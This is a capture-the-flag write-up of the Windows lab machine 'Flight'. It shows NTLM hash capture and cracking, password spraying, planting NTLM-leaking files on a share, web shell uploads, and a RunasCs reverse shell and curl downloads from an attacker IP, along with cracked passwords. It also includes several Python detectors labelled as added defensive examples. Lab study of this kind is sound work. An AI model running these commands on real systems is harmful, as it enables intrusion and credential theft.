Flight is a hard Windows machine that starts with a website serving two different virtual hosts. One of them is vulnerable to LFI and allows an attacker to retrieve an NTLM hash. Once cracked, the obtained clear-text password is sprayed across a list of valid usernames to discover a password re-use scenario. Once the attacker has SMB access as the user s.moon, he is able to write to a share that is accessed by other users. Certain files can be used to steal the NTLMv2 hash of the users who access the share. Once the second hash is cracked, the attacker is able to write a reverse shell into a share that hosts the web files and gain a shell on the box as a low-privileged user. Having credentials for the user c.bum, it is possible to gain a shell as this user, which allows the attacker to write an aspx web shell into a web site that is hosted locally; by using chisel to forward that port to our machine we can reach it and get a shell, and by abusing SeImpersonatePrivilege we can escalate to Administrator.
➜ Flight nmap -v 10.129.228.120 -sCV -oA nmap-out
Nmap scan report for 10.129.228.120
Host is up (0.25s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods:
|   Supported Methods: OPTIONS HEAD GET POST TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-15 17:35:47Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Within a second I got a hit on my Responder listener with the svc_apache hash, and I used john to crack the password.
➜ Flight john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
S@Ss!K@*t13      (svc_apache)
1g 0:00:00:04 DONE (2024-11-15 07:35) 0.2421g/s 2582Kp/s 2582Kc/s 2582KC/s SADSAM..S42150461
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
After cracking I had the credentials svc_apache:S@Ss!K@*t13; with those I enumerated the SMB shares and found a few.
➜ Flight smbclient -L \\\\flight.htb\\ -U svc_apache
Password for [WORKGROUP\svc_apache]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	Shared          Disk
	SYSVOL          Disk      Logon server share
	Users           Disk
	Web             Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to flight.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

➜ Flight smbclient \\\\flight.htb\\Users -U svc_apache
Password for [WORKGROUP\svc_apache]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Thu Sep 22 16:16:56 2022
  ..                                 DR        0  Thu Sep 22 16:16:56 2022
  .NET v4.5                           D        0  Thu Sep 22 15:28:03 2022
  .NET v4.5 Classic                   D        0  Thu Sep 22 15:28:02 2022
  Administrator                       D        0  Mon Oct 31 14:34:00 2022
  All Users                       DHSrn        0  Sat Sep 15 03:28:48 2018
  C.Bum                               D        0  Thu Sep 22 16:08:23 2022
  Default                           DHR        0  Tue Jul 20 15:20:24 2021
  Default User                    DHSrn        0  Sat Sep 15 03:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 03:16:48 2018
  Public                             DR        0  Tue Jul 20 15:23:25 2021
  svc_apache                          D        0  Fri Oct 21 14:50:21 2022

		5056511 blocks of size 4096. 1253840 blocks available
smb: \> cd C.Bum
smb: \C.Bum\> ls
NT_STATUS_ACCESS_DENIED listing \C.Bum\*
smb: \C.Bum\> cd ../svc_apache\
smb: \svc_apache\> ls
  .                                   D        0  Fri Oct 21 14:50:21 2022
  ..                                  D        0  Fri Oct 21 14:50:21 2022
  AppData                            DH        0  Thu Sep 22 16:16:56 2022
  Application Data                DHSrn        0  Thu Sep 22 16:16:56 2022
  Cookies                         DHSrn        0  Thu Sep 22 16:16:56 2022
  Desktop                            DR        0  Sat Sep 15 03:19:00 2018
  Documents                          DR        0  Thu Sep 22 16:16:56 2022
  Downloads                          DR        0  Sat Sep 15 03:19:00 2018
  Favorites                          DR        0  Sat Sep 15 03:19:00 2018
  Links                              DR        0  Sat Sep 15 03:19:00 2018
  Local Settings                  DHSrn        0  Thu Sep 22 16:16:56 2022
  Music                              DR        0  Sat Sep 15 03:19:00 2018
  My Documents                    DHSrn        0  Thu Sep 22 16:16:56 2022
  NetHood                         DHSrn        0  Thu Sep 22 16:16:56 2022
  NTUSER.DAT                        AHn   262144  Mon Oct 31 23:26:27 2022
  ntuser.dat.LOG1                   AHS   124928  Thu Sep 22 16:16:56 2022
  ntuser.dat.LOG2                   AHS   124928  Thu Sep 22 16:16:56 2022
  NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf                                        AHS    65536  Thu Sep 22 16:17:08 2022
  NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000001.regtrans-ms  AHS   524288  Thu Sep 22 16:16:56 2022
  NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000002.regtrans-ms  AHS   524288  Thu Sep 22 16:16:56 2022
  ntuser.ini                         HS       20  Thu Sep 22 16:16:56 2022
  Pictures                           DR        0  Sat Sep 15 03:19:00 2018
  PrintHood                       DHSrn        0  Thu Sep 22 16:16:56 2022
  Recent                          DHSrn        0  Thu Sep 22 16:16:56 2022
  Saved Games                         D        0  Sat Sep 15 03:19:00 2018
  SendTo                          DHSrn        0  Thu Sep 22 16:16:56 2022
  Start Menu                      DHSrn        0  Thu Sep 22 16:16:56 2022
  Templates                       DHSrn        0  Thu Sep 22 16:16:56 2022
  Videos                             DR        0  Sat Sep 15 03:19:00 2018

		5056511 blocks of size 4096. 1253840 blocks available
smb: \svc_apache\> cd Desktop
smb: \svc_apache\Desktop\> ls
  .                                  DR        0  Sat Sep 15 03:19:00 2018
  ..                                 DR        0  Sat Sep 15 03:19:00 2018

		5056511 blocks of size 4096. 1253840 blocks available
smb: \> exit

➜ Flight smbclient \\\\flight.htb\\Web -U svc_apache
Password for [WORKGROUP\svc_apache]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Nov 15 13:27:00 2024
  ..                                  D        0  Fri Nov 15 13:27:00 2024
  flight.htb                          D        0  Fri Nov 15 13:27:00 2024
  school.flight.htb                   D        0  Fri Nov 15 13:27:00 2024

		5056511 blocks of size 4096. 1253840 blocks available
smb: \> cd school.flight.htb\
smb: \school.flight.htb\> ls
  .                                   D        0  Fri Nov 15 13:27:00 2024
  ..                                  D        0  Fri Nov 15 13:27:00 2024
  about.html                          A     1689  Mon Oct 24 23:54:45 2022
  blog.html                           A     3618  Mon Oct 24 23:53:59 2022
  home.html                           A     2683  Mon Oct 24 23:56:58 2022
  images                              D        0  Fri Nov 15 13:27:00 2024
  index.php                           A     2092  Thu Oct 27 03:59:25 2022
  lfi.html                            A      179  Thu Oct 27 03:55:16 2022
  styles                              D        0  Fri Nov 15 13:27:00 2024

		5056511 blocks of size 4096. 1253840 blocks available
smb: \school.flight.htb\> cd ../flight.htb\ ls
smb: \flight.htb\> ls
  .                                   D        0  Fri Nov 15 13:27:00 2024
  ..                                  D        0  Fri Nov 15 13:27:00 2024
  css                                 D        0  Fri Nov 15 13:27:00 2024
  images                              D        0  Fri Nov 15 13:27:00 2024
  index.html                          A     7069  Thu Feb 24 00:58:10 2022
  js                                  D        0  Fri Nov 15 13:27:00 2024

		5056511 blocks of size 4096. 1253584 blocks available
smb: \flight.htb\> exit

➜ Flight smbclient \\\\flight.htb\\Shared -U svc_apache
Password for [WORKGROUP\svc_apache]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Oct 28 16:21:28 2022
  ..                                  D        0  Fri Oct 28 16:21:28 2022

		5056511 blocks of size 4096. 1253584 blocks available
smb: \> exit
I couldn't find anything interesting in the shares, so I moved on to finding other users.
I pulled the domain usernames over SMB with the valid svc_apache credentials and sprayed svc_apache's password against all of the users found, which gave a hit on one other user, S.Moon.
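The spray described above leaves a distinctive trace on the domain controller: many failed logons against different accounts from one source within seconds, followed by a success for the account whose password matched. As an added example (not part of the original write-up), a small detector over a constructed, simplified export of Security-log events; the field layout, the 60-second window and the threshold of five accounts are assumptions:

```python
"""Flag password spraying in Windows logon events.
Added example, not from the original write-up; the input is a constructed,
simplified export (timestamp, Event ID, target account, source address)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 4625 = failed logon, 4624 = successful logon.
SAMPLE_EVENTS = """\
2024-11-15T13:30:01,4625,svc_apache,10.10.16.25
2024-11-15T13:30:02,4625,c.bum,10.10.16.25
2024-11-15T13:30:02,4625,user1,10.10.16.25
2024-11-15T13:30:03,4625,user2,10.10.16.25
2024-11-15T13:30:03,4625,user3,10.10.16.25
2024-11-15T13:30:05,4624,s.moon,10.10.16.25
2024-11-15T13:31:10,4625,c.bum,10.129.228.50
"""
WINDOW = timedelta(seconds=60)
THRESHOLD = 5  # distinct accounts failing from one source inside WINDOW

def parse_events(text):
    """Parse 'timestamp,event_id,account,source' lines, oldest first."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, event_id, account, source = line.split(",")
            events.append((datetime.fromisoformat(ts), int(event_id),
                           account.lower(), source))
    return sorted(events)

def detect_spray(events, window=WINDOW, threshold=THRESHOLD):
    """Return {source: sorted accounts} for every source whose failures
    cover at least `threshold` distinct accounts in one sliding window."""
    failures = defaultdict(list)
    for ts, event_id, account, source in events:
        if event_id == 4625:
            failures[source].append((ts, account))
    alerts = {}
    for source, fails in failures.items():
        for i, (start, _) in enumerate(fails):
            hit = {acct for ts, acct in fails[i:] if ts - start <= window}
            if len(hit) >= threshold:
                alerts[source] = sorted(hit)
                break
    return alerts

def successes_from_sprayers(events, alerts):
    """Accounts that then logged on (4624) from a spraying source: the
    password-reuse hit the attacker was looking for."""
    return sorted({acct for _, event_id, acct, source in events
                   if event_id == 4624 and source in alerts})
```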
As S.Moon we have READ and WRITE permission on the Shared share, so we can try to capture the credentials of other users who browse it by uploading ntlm_theft files. The files can be generated with ntlm_theft.py.
➜ test smbclient \\\\flight.htb\\Shared -U S.moon
Password for [WORKGROUP\S.moon]:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> put *
* does not exist
smb: \> put
Autorun.inf       test.asx                  test-(fulldocx).xml  test-(includepicture).docx  test.m3u                    test.rtf               test-(url).url
desktop.ini       test-(externalcell).xlsx  test.htm             test.jnlp                   test.pdf                    test.scf               test.wax
test.application  test-(frameset).docx      test-(icon).url      test.lnk                    test-(remotetemplate).docx  test-(stylesheet).xml  zoom-attack-instructions.txt
smb: \> put *
* does not exist
smb: \> mput *
NT_STATUS_ACCESS_DENIED opening remote file \test.pdf
NT_STATUS_ACCESS_DENIED opening remote file \test.wax
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
NT_STATUS_ACCESS_DENIED opening remote file \test.asx
NT_STATUS_ACCESS_DENIED opening remote file \test.lnk
putting file test.jnlp as \test.jnlp (0.3 kb/s) (average 0.3 kb/s)
putting file test.application as \test.application (1.5 kb/s) (average 1.1 kb/s)
I started my Responder listener and uploaded the ntlm_theft files to the Shared share; after a few seconds Responder received the hash of another user, c.bum, and after cracking it I had c.bum's password.
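The files listed above work because Explorer and Office resolve icon, template and stylesheet references automatically, so a user who merely opens the share authenticates to whatever host the file names. As an added example (not from the original write-up), a scanner for a writable share that reports files of those types pointing at hosts outside an allow-list; the extension list, the allow-list (g0, g0.flight.htb) and the constructed sample files are assumptions:

```python
"""Find files on a share that make a browsing client authenticate to a
remote host (the pattern the ntlm_theft upload above relies on).
Added example, not from the original write-up; the extension list, the
allow-list and the sample files are assumptions."""
import re
import tempfile
from pathlib import Path

# File types Explorer or Office resolve on sight, fetching any icon, template
# or stylesheet they point at and sending the user's NetNTLMv2 response.
RISKY_EXT = {".scf", ".url", ".lnk", ".ini", ".library-ms", ".xml", ".rtf",
             ".htm", ".m3u", ".asx", ".wax", ".jnlp", ".application", ".inf"}
ALLOWED_HOSTS = {"g0", "g0.flight.htb"}  # assumed internal file servers

UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\")                   # \\host\share
URL_RE = re.compile(r"(?:file|smb)://([A-Za-z0-9._-]+)/", re.I)  # file://host/

def remote_hosts(data: bytes):
    """Hosts referenced by UNC or file:// paths; .lnk and some Office parts
    store strings as UTF-16, so both decodings are searched."""
    text = data.decode("utf-8", "ignore") + data.decode("utf-16-le", "ignore")
    return {h.lower() for h in UNC_RE.findall(text) + URL_RE.findall(text)}

def scan_share(root, allowed=ALLOWED_HOSTS):
    """Return sorted (relative path, host) pairs for risky files that point
    at a host outside the allow-list."""
    root = Path(root)
    findings = set()
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in RISKY_EXT:
            for host in remote_hosts(path.read_bytes()):
                if host not in allowed:
                    findings.add((path.relative_to(root).as_posix(), host))
    return sorted(findings)

def demo():
    """Write constructed samples into a temp dir and scan it."""
    root = Path(tempfile.mkdtemp())
    (root / "test.scf").write_text("[Shell]\nIconFile=\\\\10.10.16.25\\s\\t.ico\n")
    (root / "desktop.ini").write_text("[.ShellClassInfo]\nIconResource=\\\\10.10.16.25\\s\\i.ico,0\n")
    (root / "test.url").write_text("[InternetShortcut]\nURL=file://10.10.16.25/s/t.html\n")
    (root / "notes.xml").write_text('<?xml-stylesheet href="\\\\g0.flight.htb\\Web\\s.xsl"?>\n')
    (root / "readme.txt").write_text("See \\\\10.10.16.25\\s\\x\n")  # not a risky type
    return scan_share(root)
```

Run against a real share root, the same scan doubles as a periodic check that a file screen (as on this host, where several uploads were denied) has not let one of these types through.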
➜ Flight john hash2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Tikkycoll_431012284 (c.bum)
1g 0:00:00:03 DONE (2024-11-15 13:33) 0.2557g/s 2694Kp/s 2694Kc/s 2694KC/s TinyMutt69..Tiffani29
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
➜ Flight
With c.bum's credentials we have write access to the Web share, so we can upload a web shell (shell.php, since the site runs PHP) and get a shell.
➜ Flight smbclient \\\\flight.htb\\Web -U c.bum
Password for [WORKGROUP\c.bum]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Nov 15 13:37:00 2024
  ..                                  D        0  Fri Nov 15 13:37:00 2024
  flight.htb                          D        0  Fri Nov 15 13:37:00 2024
  school.flight.htb                   D        0  Fri Nov 15 13:37:00 2024

		5056511 blocks of size 4096. 1252959 blocks available
smb: \> cd school.flight.htb\
smb: \school.flight.htb\> ls
  .                                   D        0  Fri Nov 15 13:37:00 2024
  ..                                  D        0  Fri Nov 15 13:37:00 2024
  about.html                          A     1689  Mon Oct 24 23:54:45 2022
  blog.html                           A     3618  Mon Oct 24 23:53:59 2022
  home.html                           A     2683  Mon Oct 24 23:56:58 2022
  images                              D        0  Fri Nov 15 13:37:00 2024
  index.php                           A     2092  Thu Oct 27 03:59:25 2022
  lfi.html                            A      179  Thu Oct 27 03:55:16 2022
  styles                              D        0  Fri Nov 15 13:37:00 2024

		5056511 blocks of size 4096. 1252831 blocks available
smb: \school.flight.htb\> put shell.php
putting file shell.php as \school.flight.htb\shell.php (0.4 kb/s) (average 13.1 kb/s)
smb: \school.flight.htb\>
After uploading, we can request that file from the web page and trigger a normal PowerShell reverse shell; this gives us a shell as the user svc_apache.
➜ Flight nc -nvlp 1212
Listening on 0.0.0.0 1212
Connection received on 10.129.228.120 53863

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/15/2024  11:02 AM                inetpub
d-----          6/7/2022   6:39 AM                PerfLogs
d-r---        10/21/2022  11:49 AM                Program Files
d-----         7/20/2021  12:23 PM                Program Files (x86)
d-----        11/15/2024  10:36 AM                Shared
d-----         9/22/2022  12:28 PM                StorageReports
d-r---         9/22/2022   1:16 PM                Users
d-----        10/21/2022  11:52 AM                Windows
d-----         9/22/2022   1:16 PM                xampp

PS C:\> mkdir Temp

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/15/2024  11:04 AM                Temp

PS C:\> cd Temp
PS C:\Temp> ls
PS C:\Temp> curl 10.10.16.25:1337/RunasCs.exe -o RunasCs.exe
PS C:\Temp> .\RunasCs.exe C.Bum Tikkycoll_431012284 cmd.exe -r 10.10.16.25:1234
[*] Warning: The logon for user 'C.Bum' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-856ce$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 900 created in background.
PS C:\Temp>
Since we have C.Bum's credentials, I tried RunasCs.exe to spawn another shell, and it worked: we got a shell as C.Bum.
User c.bum
➜ Flight nc -nvlp 1234
Listening on 0.0.0.0 1234
Connection received on 10.129.228.120 63400
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
flight\c.bum

C:\Windows\system32>
Checking network connections, I found port 8000 listening locally, and there is also a folder named C:\inetpub\development, so some web server must be running there. Using chisel, I forwarded port 8000 to port 8989 on my local machine.
➜ Flight chisel server --reverse -p 1338 -v
2024/11/15 15:22:37 server: Reverse tunnelling enabled
2024/11/15 15:22:37 server: Fingerprint qjzDZAxmyopYIyjjHepp/tGY+pmdLBP3tWafTwLDK3o=
2024/11/15 15:22:37 server: Listening on http://0.0.0.0:1338
2024/11/15 15:22:41 server: session#1: Handshaking with 10.129.228.120:51486...
2024/11/15 15:22:45 server: session#1: Verifying configuration
2024/11/15 15:22:46 server: session#1: Client version (1.9.1) differs from server version (1.10.1-0kali1)
2024/11/15 15:22:46 server: session#1: tun: Created
2024/11/15 15:22:46 server: session#1: tun: SSH connected
2024/11/15 15:22:46 server: session#1: tun: proxy#R:8989=>8000: Listening
2024/11/15 15:22:46 server: session#1: tun: Bound proxies
Browsing to the forwarded port 8989 on my machine, I got a web page.
Since we can reach this page, and c.bum has write permission on C:\inetpub\development, we can add a web shell page to that folder and access it through the web site.
C:\inetpub\development>curl 10.10.16.25:1337/cmd.aspx -o cmd.aspx
curl 10.10.16.25:1337/cmd.aspx -o cmd.aspx
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1547  100  1547    0     0    847      0  0:00:01  0:00:01 --:--:--   847

C:\inetpub\development>
After adding a new web shell file there, I was able to access it via localhost:8989 and execute commands; by entering a simple PowerShell reverse shell we got a shell back as iis apppool\defaultapppool.
➜ Flight nc -nvlp 1290
Listening on 0.0.0.0 1290
Connection received on 10.129.228.120 51529
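Both footholds above came from a file written into a web root (shell.php through the Web share, cmd.aspx into C:\inetpub\development), which is exactly what a baseline of the deployed site catches. As an added example (not from the original write-up), a baseline-and-diff check that flags new server-side executable files and modified pages in a web root; the roots, the extension list and the constructed sample files are assumptions:

```python
"""Detect files dropped into a web root, such as the shell.php and cmd.aspx
placed above through the Web share and C:\\inetpub\\development.
Added example, not from the original write-up; the roots, extensions and
sample files are assumptions."""
import hashlib
import tempfile
from pathlib import Path

# Server-side executable types for the stacks seen on this host (PHP on
# Apache/XAMPP, ASP.NET on IIS).
EXEC_EXT = {".php", ".phtml", ".aspx", ".asp", ".ashx", ".asmx", ".config"}

def snapshot(root):
    """Map each file's relative path to its SHA-256 (the baseline)."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def diff_webroot(baseline, current):
    """Return {"new_exec": [...], "changed": [...], "new_other": [...]}."""
    report = {"new_exec": [], "changed": [], "new_other": []}
    for rel, digest in sorted(current.items()):
        if rel not in baseline:
            key = "new_exec" if Path(rel).suffix.lower() in EXEC_EXT else "new_other"
            report[key].append(rel)
        elif baseline[rel] != digest:
            report["changed"].append(rel)
    return report

def demo():
    """Baseline a constructed site, then 'drop' a shell and alter a page."""
    root = Path(tempfile.mkdtemp())
    site = root / "school.flight.htb"
    site.mkdir()
    (site / "index.php").write_text("<?php echo 'home'; ?>\n")
    (site / "about.html").write_text("<h1>About</h1>\n")
    baseline = snapshot(root)                      # taken at deploy time
    (site / "shell.php").write_text("<?php /* dropped */ ?>\n")
    (site / "about.html").write_text("<h1>Changed</h1>\n")
    (site / "logo.png").write_bytes(b"\x89PNG")
    return diff_webroot(baseline, snapshot(root))
```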
Checking privileges shows that we have SeImpersonatePrivilege, so we can use GodPotato to get Administrator.
PS C:\windows\system32\inetsrv> cd C:/
PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\>